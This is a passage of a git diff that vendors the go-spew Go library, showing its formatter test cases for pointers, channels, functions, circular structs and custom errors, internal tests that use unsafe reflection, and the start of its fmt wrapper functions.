+ v := uintptr(0) + nv := (*uintptr)(nil) + pv := &v + vAddr := fmt.Sprintf("%p", pv) + pvAddr := fmt.Sprintf("%p", &pv) + vt := "uintptr" + vs := "" + addFormatterTest("%v", v, vs) + addFormatterTest("%v", pv, "<*>"+vs) + addFormatterTest("%v", &pv, "<**>"+vs) + addFormatterTest("%+v", nv, "") + addFormatterTest("%+v", v, vs) + addFormatterTest("%+v", pv, "<*>("+vAddr+")"+vs) + addFormatterTest("%+v", &pv, "<**>("+pvAddr+"->"+vAddr+")"+vs) + addFormatterTest("%+v", nv, "") + addFormatterTest("%#v", v, "("+vt+")"+vs) + addFormatterTest("%#v", pv, "(*"+vt+")"+vs) + addFormatterTest("%#v", &pv, "(**"+vt+")"+vs) + addFormatterTest("%#v", nv, "(*"+vt+")"+"") + addFormatterTest("%#+v", v, "("+vt+")"+vs) + addFormatterTest("%#+v", pv, "(*"+vt+")("+vAddr+")"+vs) + addFormatterTest("%#+v", &pv, "(**"+vt+")("+pvAddr+"->"+vAddr+")"+vs) + addFormatterTest("%#+v", nv, "(*"+vt+")"+"") + + // Address of real variable. + i := 1 + v2 := uintptr(unsafe.Pointer(&i)) + pv2 := &v2 + v2Addr := fmt.Sprintf("%p", pv2) + pv2Addr := fmt.Sprintf("%p", &pv2) + v2t := "uintptr" + v2s := fmt.Sprintf("%p", &i) + addFormatterTest("%v", v2, v2s) + addFormatterTest("%v", pv2, "<*>"+v2s) + addFormatterTest("%v", &pv2, "<**>"+v2s) + addFormatterTest("%+v", v2, v2s) + addFormatterTest("%+v", pv2, "<*>("+v2Addr+")"+v2s) + addFormatterTest("%+v", &pv2, "<**>("+pv2Addr+"->"+v2Addr+")"+v2s) + addFormatterTest("%#v", v2, "("+v2t+")"+v2s) + addFormatterTest("%#v", pv2, "(*"+v2t+")"+v2s) + addFormatterTest("%#v", &pv2, "(**"+v2t+")"+v2s) + addFormatterTest("%#+v", v2, "("+v2t+")"+v2s) + addFormatterTest("%#+v", pv2, "(*"+v2t+")("+v2Addr+")"+v2s) + addFormatterTest("%#+v", &pv2, "(**"+v2t+")("+pv2Addr+"->"+v2Addr+")"+v2s) +} + +func addUnsafePointerFormatterTests() { + // Null pointer. 
+ v := unsafe.Pointer(uintptr(0)) + nv := (*unsafe.Pointer)(nil) + pv := &v + vAddr := fmt.Sprintf("%p", pv) + pvAddr := fmt.Sprintf("%p", &pv) + vt := "unsafe.Pointer" + vs := "" + addFormatterTest("%v", v, vs) + addFormatterTest("%v", pv, "<*>"+vs) + addFormatterTest("%v", &pv, "<**>"+vs) + addFormatterTest("%+v", nv, "") + addFormatterTest("%+v", v, vs) + addFormatterTest("%+v", pv, "<*>("+vAddr+")"+vs) + addFormatterTest("%+v", &pv, "<**>("+pvAddr+"->"+vAddr+")"+vs) + addFormatterTest("%+v", nv, "") + addFormatterTest("%#v", v, "("+vt+")"+vs) + addFormatterTest("%#v", pv, "(*"+vt+")"+vs) + addFormatterTest("%#v", &pv, "(**"+vt+")"+vs) + addFormatterTest("%#v", nv, "(*"+vt+")"+"") + addFormatterTest("%#+v", v, "("+vt+")"+vs) + addFormatterTest("%#+v", pv, "(*"+vt+")("+vAddr+")"+vs) + addFormatterTest("%#+v", &pv, "(**"+vt+")("+pvAddr+"->"+vAddr+")"+vs) + addFormatterTest("%#+v", nv, "(*"+vt+")"+"") + + // Address of real variable. + i := 1 + v2 := unsafe.Pointer(&i) + pv2 := &v2 + v2Addr := fmt.Sprintf("%p", pv2) + pv2Addr := fmt.Sprintf("%p", &pv2) + v2t := "unsafe.Pointer" + v2s := fmt.Sprintf("%p", &i) + addFormatterTest("%v", v2, v2s) + addFormatterTest("%v", pv2, "<*>"+v2s) + addFormatterTest("%v", &pv2, "<**>"+v2s) + addFormatterTest("%+v", v2, v2s) + addFormatterTest("%+v", pv2, "<*>("+v2Addr+")"+v2s) + addFormatterTest("%+v", &pv2, "<**>("+pv2Addr+"->"+v2Addr+")"+v2s) + addFormatterTest("%#v", v2, "("+v2t+")"+v2s) + addFormatterTest("%#v", pv2, "(*"+v2t+")"+v2s) + addFormatterTest("%#v", &pv2, "(**"+v2t+")"+v2s) + addFormatterTest("%#+v", v2, "("+v2t+")"+v2s) + addFormatterTest("%#+v", pv2, "(*"+v2t+")("+v2Addr+")"+v2s) + addFormatterTest("%#+v", &pv2, "(**"+v2t+")("+pv2Addr+"->"+v2Addr+")"+v2s) +} + +func addChanFormatterTests() { + // Nil channel. 
+ var v chan int + pv := &v + nv := (*chan int)(nil) + vAddr := fmt.Sprintf("%p", pv) + pvAddr := fmt.Sprintf("%p", &pv) + vt := "chan int" + vs := "" + addFormatterTest("%v", v, vs) + addFormatterTest("%v", pv, "<*>"+vs) + addFormatterTest("%v", &pv, "<**>"+vs) + addFormatterTest("%+v", nv, "") + addFormatterTest("%+v", v, vs) + addFormatterTest("%+v", pv, "<*>("+vAddr+")"+vs) + addFormatterTest("%+v", &pv, "<**>("+pvAddr+"->"+vAddr+")"+vs) + addFormatterTest("%+v", nv, "") + addFormatterTest("%#v", v, "("+vt+")"+vs) + addFormatterTest("%#v", pv, "(*"+vt+")"+vs) + addFormatterTest("%#v", &pv, "(**"+vt+")"+vs) + addFormatterTest("%#v", nv, "(*"+vt+")"+"") + addFormatterTest("%#+v", v, "("+vt+")"+vs) + addFormatterTest("%#+v", pv, "(*"+vt+")("+vAddr+")"+vs) + addFormatterTest("%#+v", &pv, "(**"+vt+")("+pvAddr+"->"+vAddr+")"+vs) + addFormatterTest("%#+v", nv, "(*"+vt+")"+"") + + // Real channel. + v2 := make(chan int) + pv2 := &v2 + v2Addr := fmt.Sprintf("%p", pv2) + pv2Addr := fmt.Sprintf("%p", &pv2) + v2t := "chan int" + v2s := fmt.Sprintf("%p", v2) + addFormatterTest("%v", v2, v2s) + addFormatterTest("%v", pv2, "<*>"+v2s) + addFormatterTest("%v", &pv2, "<**>"+v2s) + addFormatterTest("%+v", v2, v2s) + addFormatterTest("%+v", pv2, "<*>("+v2Addr+")"+v2s) + addFormatterTest("%+v", &pv2, "<**>("+pv2Addr+"->"+v2Addr+")"+v2s) + addFormatterTest("%#v", v2, "("+v2t+")"+v2s) + addFormatterTest("%#v", pv2, "(*"+v2t+")"+v2s) + addFormatterTest("%#v", &pv2, "(**"+v2t+")"+v2s) + addFormatterTest("%#+v", v2, "("+v2t+")"+v2s) + addFormatterTest("%#+v", pv2, "(*"+v2t+")("+v2Addr+")"+v2s) + addFormatterTest("%#+v", &pv2, "(**"+v2t+")("+pv2Addr+"->"+v2Addr+")"+v2s) +} + +func addFuncFormatterTests() { + // Function with no params and no returns. 
+ v := addIntFormatterTests + nv := (*func())(nil) + pv := &v + vAddr := fmt.Sprintf("%p", pv) + pvAddr := fmt.Sprintf("%p", &pv) + vt := "func()" + vs := fmt.Sprintf("%p", v) + addFormatterTest("%v", v, vs) + addFormatterTest("%v", pv, "<*>"+vs) + addFormatterTest("%v", &pv, "<**>"+vs) + addFormatterTest("%+v", nv, "") + addFormatterTest("%+v", v, vs) + addFormatterTest("%+v", pv, "<*>("+vAddr+")"+vs) + addFormatterTest("%+v", &pv, "<**>("+pvAddr+"->"+vAddr+")"+vs) + addFormatterTest("%+v", nv, "") + addFormatterTest("%#v", v, "("+vt+")"+vs) + addFormatterTest("%#v", pv, "(*"+vt+")"+vs) + addFormatterTest("%#v", &pv, "(**"+vt+")"+vs) + addFormatterTest("%#v", nv, "(*"+vt+")"+"") + addFormatterTest("%#+v", v, "("+vt+")"+vs) + addFormatterTest("%#+v", pv, "(*"+vt+")("+vAddr+")"+vs) + addFormatterTest("%#+v", &pv, "(**"+vt+")("+pvAddr+"->"+vAddr+")"+vs) + addFormatterTest("%#+v", nv, "(*"+vt+")"+"") + + // Function with param and no returns. + v2 := TestFormatter + nv2 := (*func(*testing.T))(nil) + pv2 := &v2 + v2Addr := fmt.Sprintf("%p", pv2) + pv2Addr := fmt.Sprintf("%p", &pv2) + v2t := "func(*testing.T)" + v2s := fmt.Sprintf("%p", v2) + addFormatterTest("%v", v2, v2s) + addFormatterTest("%v", pv2, "<*>"+v2s) + addFormatterTest("%v", &pv2, "<**>"+v2s) + addFormatterTest("%+v", nv2, "") + addFormatterTest("%+v", v2, v2s) + addFormatterTest("%+v", pv2, "<*>("+v2Addr+")"+v2s) + addFormatterTest("%+v", &pv2, "<**>("+pv2Addr+"->"+v2Addr+")"+v2s) + addFormatterTest("%+v", nv2, "") + addFormatterTest("%#v", v2, "("+v2t+")"+v2s) + addFormatterTest("%#v", pv2, "(*"+v2t+")"+v2s) + addFormatterTest("%#v", &pv2, "(**"+v2t+")"+v2s) + addFormatterTest("%#v", nv2, "(*"+v2t+")"+"") + addFormatterTest("%#+v", v2, "("+v2t+")"+v2s) + addFormatterTest("%#+v", pv2, "(*"+v2t+")("+v2Addr+")"+v2s) + addFormatterTest("%#+v", &pv2, "(**"+v2t+")("+pv2Addr+"->"+v2Addr+")"+v2s) + addFormatterTest("%#+v", nv2, "(*"+v2t+")"+"") + + // Function with multiple params and multiple returns. 
+ var v3 = func(i int, s string) (b bool, err error) { + return true, nil + } + nv3 := (*func(int, string) (bool, error))(nil) + pv3 := &v3 + v3Addr := fmt.Sprintf("%p", pv3) + pv3Addr := fmt.Sprintf("%p", &pv3) + v3t := "func(int, string) (bool, error)" + v3s := fmt.Sprintf("%p", v3) + addFormatterTest("%v", v3, v3s) + addFormatterTest("%v", pv3, "<*>"+v3s) + addFormatterTest("%v", &pv3, "<**>"+v3s) + addFormatterTest("%+v", nv3, "") + addFormatterTest("%+v", v3, v3s) + addFormatterTest("%+v", pv3, "<*>("+v3Addr+")"+v3s) + addFormatterTest("%+v", &pv3, "<**>("+pv3Addr+"->"+v3Addr+")"+v3s) + addFormatterTest("%+v", nv3, "") + addFormatterTest("%#v", v3, "("+v3t+")"+v3s) + addFormatterTest("%#v", pv3, "(*"+v3t+")"+v3s) + addFormatterTest("%#v", &pv3, "(**"+v3t+")"+v3s) + addFormatterTest("%#v", nv3, "(*"+v3t+")"+"") + addFormatterTest("%#+v", v3, "("+v3t+")"+v3s) + addFormatterTest("%#+v", pv3, "(*"+v3t+")("+v3Addr+")"+v3s) + addFormatterTest("%#+v", &pv3, "(**"+v3t+")("+pv3Addr+"->"+v3Addr+")"+v3s) + addFormatterTest("%#+v", nv3, "(*"+v3t+")"+"") +} + +func addCircularFormatterTests() { + // Struct that is circular through self referencing. 
+ type circular struct { + c *circular + } + v := circular{nil} + v.c = &v + pv := &v + vAddr := fmt.Sprintf("%p", pv) + pvAddr := fmt.Sprintf("%p", &pv) + vt := "spew_test.circular" + vs := "{<*>{<*>}}" + vs2 := "{<*>}" + vs3 := "{c:<*>(" + vAddr + "){c:<*>(" + vAddr + ")}}" + vs4 := "{c:<*>(" + vAddr + ")}" + vs5 := "{c:(*" + vt + "){c:(*" + vt + ")}}" + vs6 := "{c:(*" + vt + ")}" + vs7 := "{c:(*" + vt + ")(" + vAddr + "){c:(*" + vt + ")(" + vAddr + + ")}}" + vs8 := "{c:(*" + vt + ")(" + vAddr + ")}" + addFormatterTest("%v", v, vs) + addFormatterTest("%v", pv, "<*>"+vs2) + addFormatterTest("%v", &pv, "<**>"+vs2) + addFormatterTest("%+v", v, vs3) + addFormatterTest("%+v", pv, "<*>("+vAddr+")"+vs4) + addFormatterTest("%+v", &pv, "<**>("+pvAddr+"->"+vAddr+")"+vs4) + addFormatterTest("%#v", v, "("+vt+")"+vs5) + addFormatterTest("%#v", pv, "(*"+vt+")"+vs6) + addFormatterTest("%#v", &pv, "(**"+vt+")"+vs6) + addFormatterTest("%#+v", v, "("+vt+")"+vs7) + addFormatterTest("%#+v", pv, "(*"+vt+")("+vAddr+")"+vs8) + addFormatterTest("%#+v", &pv, "(**"+vt+")("+pvAddr+"->"+vAddr+")"+vs8) + + // Structs that are circular through cross referencing. 
+ v2 := xref1{nil} + ts2 := xref2{&v2} + v2.ps2 = &ts2 + pv2 := &v2 + ts2Addr := fmt.Sprintf("%p", &ts2) + v2Addr := fmt.Sprintf("%p", pv2) + pv2Addr := fmt.Sprintf("%p", &pv2) + v2t := "spew_test.xref1" + v2t2 := "spew_test.xref2" + v2s := "{<*>{<*>{<*>}}}" + v2s2 := "{<*>{<*>}}" + v2s3 := "{ps2:<*>(" + ts2Addr + "){ps1:<*>(" + v2Addr + "){ps2:<*>(" + + ts2Addr + ")}}}" + v2s4 := "{ps2:<*>(" + ts2Addr + "){ps1:<*>(" + v2Addr + ")}}" + v2s5 := "{ps2:(*" + v2t2 + "){ps1:(*" + v2t + "){ps2:(*" + v2t2 + + ")}}}" + v2s6 := "{ps2:(*" + v2t2 + "){ps1:(*" + v2t + ")}}" + v2s7 := "{ps2:(*" + v2t2 + ")(" + ts2Addr + "){ps1:(*" + v2t + + ")(" + v2Addr + "){ps2:(*" + v2t2 + ")(" + ts2Addr + + ")}}}" + v2s8 := "{ps2:(*" + v2t2 + ")(" + ts2Addr + "){ps1:(*" + v2t + + ")(" + v2Addr + ")}}" + addFormatterTest("%v", v2, v2s) + addFormatterTest("%v", pv2, "<*>"+v2s2) + addFormatterTest("%v", &pv2, "<**>"+v2s2) + addFormatterTest("%+v", v2, v2s3) + addFormatterTest("%+v", pv2, "<*>("+v2Addr+")"+v2s4) + addFormatterTest("%+v", &pv2, "<**>("+pv2Addr+"->"+v2Addr+")"+v2s4) + addFormatterTest("%#v", v2, "("+v2t+")"+v2s5) + addFormatterTest("%#v", pv2, "(*"+v2t+")"+v2s6) + addFormatterTest("%#v", &pv2, "(**"+v2t+")"+v2s6) + addFormatterTest("%#+v", v2, "("+v2t+")"+v2s7) + addFormatterTest("%#+v", pv2, "(*"+v2t+")("+v2Addr+")"+v2s8) + addFormatterTest("%#+v", &pv2, "(**"+v2t+")("+pv2Addr+"->"+v2Addr+")"+v2s8) + + // Structs that are indirectly circular. 
+ v3 := indirCir1{nil} + tic2 := indirCir2{nil} + tic3 := indirCir3{&v3} + tic2.ps3 = &tic3 + v3.ps2 = &tic2 + pv3 := &v3 + tic2Addr := fmt.Sprintf("%p", &tic2) + tic3Addr := fmt.Sprintf("%p", &tic3) + v3Addr := fmt.Sprintf("%p", pv3) + pv3Addr := fmt.Sprintf("%p", &pv3) + v3t := "spew_test.indirCir1" + v3t2 := "spew_test.indirCir2" + v3t3 := "spew_test.indirCir3" + v3s := "{<*>{<*>{<*>{<*>}}}}" + v3s2 := "{<*>{<*>{<*>}}}" + v3s3 := "{ps2:<*>(" + tic2Addr + "){ps3:<*>(" + tic3Addr + "){ps1:<*>(" + + v3Addr + "){ps2:<*>(" + tic2Addr + ")}}}}" + v3s4 := "{ps2:<*>(" + tic2Addr + "){ps3:<*>(" + tic3Addr + "){ps1:<*>(" + + v3Addr + ")}}}" + v3s5 := "{ps2:(*" + v3t2 + "){ps3:(*" + v3t3 + "){ps1:(*" + v3t + + "){ps2:(*" + v3t2 + ")}}}}" + v3s6 := "{ps2:(*" + v3t2 + "){ps3:(*" + v3t3 + "){ps1:(*" + v3t + + ")}}}" + v3s7 := "{ps2:(*" + v3t2 + ")(" + tic2Addr + "){ps3:(*" + v3t3 + ")(" + + tic3Addr + "){ps1:(*" + v3t + ")(" + v3Addr + "){ps2:(*" + v3t2 + + ")(" + tic2Addr + ")}}}}" + v3s8 := "{ps2:(*" + v3t2 + ")(" + tic2Addr + "){ps3:(*" + v3t3 + ")(" + + tic3Addr + "){ps1:(*" + v3t + ")(" + v3Addr + ")}}}" + addFormatterTest("%v", v3, v3s) + addFormatterTest("%v", pv3, "<*>"+v3s2) + addFormatterTest("%v", &pv3, "<**>"+v3s2) + addFormatterTest("%+v", v3, v3s3) + addFormatterTest("%+v", pv3, "<*>("+v3Addr+")"+v3s4) + addFormatterTest("%+v", &pv3, "<**>("+pv3Addr+"->"+v3Addr+")"+v3s4) + addFormatterTest("%#v", v3, "("+v3t+")"+v3s5) + addFormatterTest("%#v", pv3, "(*"+v3t+")"+v3s6) + addFormatterTest("%#v", &pv3, "(**"+v3t+")"+v3s6) + addFormatterTest("%#+v", v3, "("+v3t+")"+v3s7) + addFormatterTest("%#+v", pv3, "(*"+v3t+")("+v3Addr+")"+v3s8) + addFormatterTest("%#+v", &pv3, "(**"+v3t+")("+pv3Addr+"->"+v3Addr+")"+v3s8) +} + +func addPanicFormatterTests() { + // Type that panics in its Stringer interface. 
+ v := panicer(127) + nv := (*panicer)(nil) + pv := &v + vAddr := fmt.Sprintf("%p", pv) + pvAddr := fmt.Sprintf("%p", &pv) + vt := "spew_test.panicer" + vs := "(PANIC=test panic)127" + addFormatterTest("%v", v, vs) + addFormatterTest("%v", pv, "<*>"+vs) + addFormatterTest("%v", &pv, "<**>"+vs) + addFormatterTest("%v", nv, "") + addFormatterTest("%+v", v, vs) + addFormatterTest("%+v", pv, "<*>("+vAddr+")"+vs) + addFormatterTest("%+v", &pv, "<**>("+pvAddr+"->"+vAddr+")"+vs) + addFormatterTest("%+v", nv, "") + addFormatterTest("%#v", v, "("+vt+")"+vs) + addFormatterTest("%#v", pv, "(*"+vt+")"+vs) + addFormatterTest("%#v", &pv, "(**"+vt+")"+vs) + addFormatterTest("%#v", nv, "(*"+vt+")"+"") + addFormatterTest("%#+v", v, "("+vt+")"+vs) + addFormatterTest("%#+v", pv, "(*"+vt+")("+vAddr+")"+vs) + addFormatterTest("%#+v", &pv, "(**"+vt+")("+pvAddr+"->"+vAddr+")"+vs) + addFormatterTest("%#+v", nv, "(*"+vt+")"+"") +} + +func addErrorFormatterTests() { + // Type that has a custom Error interface. + v := customError(127) + nv := (*customError)(nil) + pv := &v + vAddr := fmt.Sprintf("%p", pv) + pvAddr := fmt.Sprintf("%p", &pv) + vt := "spew_test.customError" + vs := "error: 127" + addFormatterTest("%v", v, vs) + addFormatterTest("%v", pv, "<*>"+vs) + addFormatterTest("%v", &pv, "<**>"+vs) + addFormatterTest("%v", nv, "") + addFormatterTest("%+v", v, vs) + addFormatterTest("%+v", pv, "<*>("+vAddr+")"+vs) + addFormatterTest("%+v", &pv, "<**>("+pvAddr+"->"+vAddr+")"+vs) + addFormatterTest("%+v", nv, "") + addFormatterTest("%#v", v, "("+vt+")"+vs) + addFormatterTest("%#v", pv, "(*"+vt+")"+vs) + addFormatterTest("%#v", &pv, "(**"+vt+")"+vs) + addFormatterTest("%#v", nv, "(*"+vt+")"+"") + addFormatterTest("%#+v", v, "("+vt+")"+vs) + addFormatterTest("%#+v", pv, "(*"+vt+")("+vAddr+")"+vs) + addFormatterTest("%#+v", &pv, "(**"+vt+")("+pvAddr+"->"+vAddr+")"+vs) + addFormatterTest("%#+v", nv, "(*"+vt+")"+"") +} + +func addPassthroughFormatterTests() { + // %x passthrough with uint. 
+ v := uint(4294967295) + pv := &v + vAddr := fmt.Sprintf("%x", pv) + pvAddr := fmt.Sprintf("%x", &pv) + vs := "ffffffff" + addFormatterTest("%x", v, vs) + addFormatterTest("%x", pv, vAddr) + addFormatterTest("%x", &pv, pvAddr) + + // %#x passthrough with uint. + v2 := int(2147483647) + pv2 := &v2 + v2Addr := fmt.Sprintf("%#x", pv2) + pv2Addr := fmt.Sprintf("%#x", &pv2) + v2s := "0x7fffffff" + addFormatterTest("%#x", v2, v2s) + addFormatterTest("%#x", pv2, v2Addr) + addFormatterTest("%#x", &pv2, pv2Addr) + + // %f passthrough with precision. + addFormatterTest("%.2f", 3.1415, "3.14") + addFormatterTest("%.3f", 3.1415, "3.142") + addFormatterTest("%.4f", 3.1415, "3.1415") + + // %f passthrough with width and precision. + addFormatterTest("%5.2f", 3.1415, " 3.14") + addFormatterTest("%6.3f", 3.1415, " 3.142") + addFormatterTest("%7.4f", 3.1415, " 3.1415") + + // %d passthrough with width. + addFormatterTest("%3d", 127, "127") + addFormatterTest("%4d", 127, " 127") + addFormatterTest("%5d", 127, " 127") + + // %q passthrough with string. + addFormatterTest("%q", "test", "\"test\"") +} + +// TestFormatter executes all of the tests described by formatterTests. +func TestFormatter(t *testing.T) { + // Setup tests. 
+ addIntFormatterTests() + addUintFormatterTests() + addBoolFormatterTests() + addFloatFormatterTests() + addComplexFormatterTests() + addArrayFormatterTests() + addSliceFormatterTests() + addStringFormatterTests() + addInterfaceFormatterTests() + addMapFormatterTests() + addStructFormatterTests() + addUintptrFormatterTests() + addUnsafePointerFormatterTests() + addChanFormatterTests() + addFuncFormatterTests() + addCircularFormatterTests() + addPanicFormatterTests() + addErrorFormatterTests() + addPassthroughFormatterTests() + + t.Logf("Running %d tests", len(formatterTests)) + for i, test := range formatterTests { + buf := new(bytes.Buffer) + spew.Fprintf(buf, test.format, test.in) + s := buf.String() + if testFailed(s, test.wants) { + t.Errorf("Formatter #%d format: %s got: %s %s", i, test.format, s, + stringizeWants(test.wants)) + continue + } + } +} + +type testStruct struct { + x int +} + +func (ts testStruct) String() string { + return fmt.Sprintf("ts.%d", ts.x) +} + +type testStructP struct { + x int +} + +func (ts *testStructP) String() string { + return fmt.Sprintf("ts.%d", ts.x) +} + +func TestPrintSortedKeys(t *testing.T) { + cfg := spew.ConfigState{SortKeys: true} + s := cfg.Sprint(map[int]string{1: "1", 3: "3", 2: "2"}) + expected := "map[1:1 2:2 3:3]" + if s != expected { + t.Errorf("Sorted keys mismatch 1:\n %v %v", s, expected) + } + + s = cfg.Sprint(map[stringer]int{"1": 1, "3": 3, "2": 2}) + expected = "map[stringer 1:1 stringer 2:2 stringer 3:3]" + if s != expected { + t.Errorf("Sorted keys mismatch 2:\n %v %v", s, expected) + } + + s = cfg.Sprint(map[pstringer]int{pstringer("1"): 1, pstringer("3"): 3, pstringer("2"): 2}) + expected = "map[stringer 1:1 stringer 2:2 stringer 3:3]" + if spew.UnsafeDisabled { + expected = "map[1:1 2:2 3:3]" + } + if s != expected { + t.Errorf("Sorted keys mismatch 3:\n %v %v", s, expected) + } + + s = cfg.Sprint(map[testStruct]int{testStruct{1}: 1, testStruct{3}: 3, testStruct{2}: 2}) + expected = "map[ts.1:1 
ts.2:2 ts.3:3]" + if s != expected { + t.Errorf("Sorted keys mismatch 4:\n %v %v", s, expected) + } + + if !spew.UnsafeDisabled { + s = cfg.Sprint(map[testStructP]int{testStructP{1}: 1, testStructP{3}: 3, testStructP{2}: 2}) + expected = "map[ts.1:1 ts.2:2 ts.3:3]" + if s != expected { + t.Errorf("Sorted keys mismatch 5:\n %v %v", s, expected) + } + } + + s = cfg.Sprint(map[customError]int{customError(1): 1, customError(3): 3, customError(2): 2}) + expected = "map[error: 1:1 error: 2:2 error: 3:3]" + if s != expected { + t.Errorf("Sorted keys mismatch 6:\n %v %v", s, expected) + } +} diff --git a/vendor/github.com/davecgh/go-spew/spew/internal_test.go b/vendor/github.com/davecgh/go-spew/spew/internal_test.go new file mode 100644 index 0000000000..20a9cfefc6 --- /dev/null +++ b/vendor/github.com/davecgh/go-spew/spew/internal_test.go @@ -0,0 +1,87 @@ +/* + * Copyright (c) 2013-2016 Dave Collins + * + * Permission to use, copy, modify, and distribute this software for any + * purpose with or without fee is hereby granted, provided that the above + * copyright notice and this permission notice appear in all copies. + * + * THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES + * WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF + * MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR + * ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES + * WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN + * ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF + * OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. + */ + +/* +This test file is part of the spew package rather than than the spew_test +package because it needs access to internals to properly test certain cases +which are not possible via the public interface since they should never happen. 
+*/ + +package spew + +import ( + "bytes" + "reflect" + "testing" +) + +// dummyFmtState implements a fake fmt.State to use for testing invalid +// reflect.Value handling. This is necessary because the fmt package catches +// invalid values before invoking the formatter on them. +type dummyFmtState struct { + bytes.Buffer +} + +func (dfs *dummyFmtState) Flag(f int) bool { + if f == int('+') { + return true + } + return false +} + +func (dfs *dummyFmtState) Precision() (int, bool) { + return 0, false +} + +func (dfs *dummyFmtState) Width() (int, bool) { + return 0, false +} + +// TestInvalidReflectValue ensures the dump and formatter code handles an +// invalid reflect value properly. This needs access to internal state since it +// should never happen in real code and therefore can't be tested via the public +// API. +func TestInvalidReflectValue(t *testing.T) { + i := 1 + + // Dump invalid reflect value. + v := new(reflect.Value) + buf := new(bytes.Buffer) + d := dumpState{w: buf, cs: &Config} + d.dump(*v) + s := buf.String() + want := "" + if s != want { + t.Errorf("InvalidReflectValue #%d\n got: %s want: %s", i, s, want) + } + i++ + + // Formatter invalid reflect value. + buf2 := new(dummyFmtState) + f := formatState{value: *v, cs: &Config, fs: buf2} + f.format(*v) + s = buf2.String() + want = "" + if s != want { + t.Errorf("InvalidReflectValue #%d got: %s want: %s", i, s, want) + } +} + +// SortValues makes the internal sortValues function available to the test +// package. 
+func SortValues(values []reflect.Value, cs *ConfigState) { + sortValues(values, cs) +} diff --git a/vendor/github.com/davecgh/go-spew/spew/internalunsafe_test.go b/vendor/github.com/davecgh/go-spew/spew/internalunsafe_test.go new file mode 100644 index 0000000000..a0c612ec3d --- /dev/null +++ b/vendor/github.com/davecgh/go-spew/spew/internalunsafe_test.go @@ -0,0 +1,102 @@ +// Copyright (c) 2013-2016 Dave Collins + +// Permission to use, copy, modify, and distribute this software for any +// purpose with or without fee is hereby granted, provided that the above +// copyright notice and this permission notice appear in all copies. + +// THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES +// WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF +// MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR +// ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES +// WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN +// ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF +// OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. + +// NOTE: Due to the following build constraints, this file will only be compiled +// when the code is not running on Google App Engine, compiled by GopherJS, and +// "-tags safe" is not added to the go build command line. The "disableunsafe" +// tag is deprecated and thus should not be used. +// +build !js,!appengine,!safe,!disableunsafe + +/* +This test file is part of the spew package rather than than the spew_test +package because it needs access to internals to properly test certain cases +which are not possible via the public interface since they should never happen. +*/ + +package spew + +import ( + "bytes" + "reflect" + "testing" + "unsafe" +) + +// changeKind uses unsafe to intentionally change the kind of a reflect.Value to +// the maximum kind value which does not exist. 
This is needed to test the +// fallback code which punts to the standard fmt library for new types that +// might get added to the language. +func changeKind(v *reflect.Value, readOnly bool) { + rvf := (*uintptr)(unsafe.Pointer(uintptr(unsafe.Pointer(v)) + offsetFlag)) + *rvf = *rvf | ((1< + * + * Permission to use, copy, modify, and distribute this software for any + * purpose with or without fee is hereby granted, provided that the above + * copyright notice and this permission notice appear in all copies. + * + * THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES + * WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF + * MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR + * ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES + * WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN + * ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF + * OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. + */ + +package spew + +import ( + "fmt" + "io" +) + +// Errorf is a wrapper for fmt.Errorf that treats each argument as if it were +// passed with a default Formatter interface returned by NewFormatter. It +// returns the formatted string as a value that satisfies error. See +// NewFormatter for formatting details. +// +// This function is shorthand for the following syntax: +// +// fmt.Errorf(format, spew.NewFormatter(a), spew.NewFormatter(b)) +func Errorf(format string, a ...interface{}) (err error) { + return fmt.Errorf(format, convertArgs(a)...) +} + +// Fprint is a wrapper for fmt.Fprint that treats each argument as if it were +// passed with a default Formatter interface returned by NewFormatter. It +// returns the number of bytes written and any write error encountered. See +// NewFormatter for formatting details. 
+// +// This function is shorthand for the following syntax: +// +// fmt.Fprint(w, spew.NewFormatter(a), spew.NewFormatter(b)) +func Fprint(w io.Writer, a ...interface{}) (n int, err error) { + return fmt.Fprint(w, convertArgs(a)...) +} + +// Fprintf is a wrapper for fmt.Fprintf that treats each argument as if it were +// passed with a default Formatter interface returned by NewFormatter. It +// returns the number of bytes written and any write error encountered. See +// NewFormatter for formatting details. +// +// This function is shorthand for the following syntax: +// +// fmt.Fprintf(w, format, spew.NewFormatter(a), spew.NewFormatter(b)) +func Fprintf(w io.Writer, format string, a ...interface{}) (n int, err error) { + return fmt.Fprintf(w, format, convertArgs(a)...) +} + +// Fprintln is a wrapper for fmt.Fprintln that treats each argument as if it +// passed with a default Formatter interface returned by NewFormatter. See +// NewFormatter for formatting details. +// +// This function is shorthand for the following syntax: +// +// fmt.Fprintln(w, spew.NewFormatter(a), spew.NewFormatter(b)) +func Fprintln(w io.Writer, a ...interface{}) (n int, err error) { + return fmt.Fprintln(w, convertArgs(a)...) +} + +// Print is a wrapper for fmt.Print that treats each argument as if it were +// passed with a default Formatter interface returned by NewFormatter. It +// returns the number of bytes written and any write 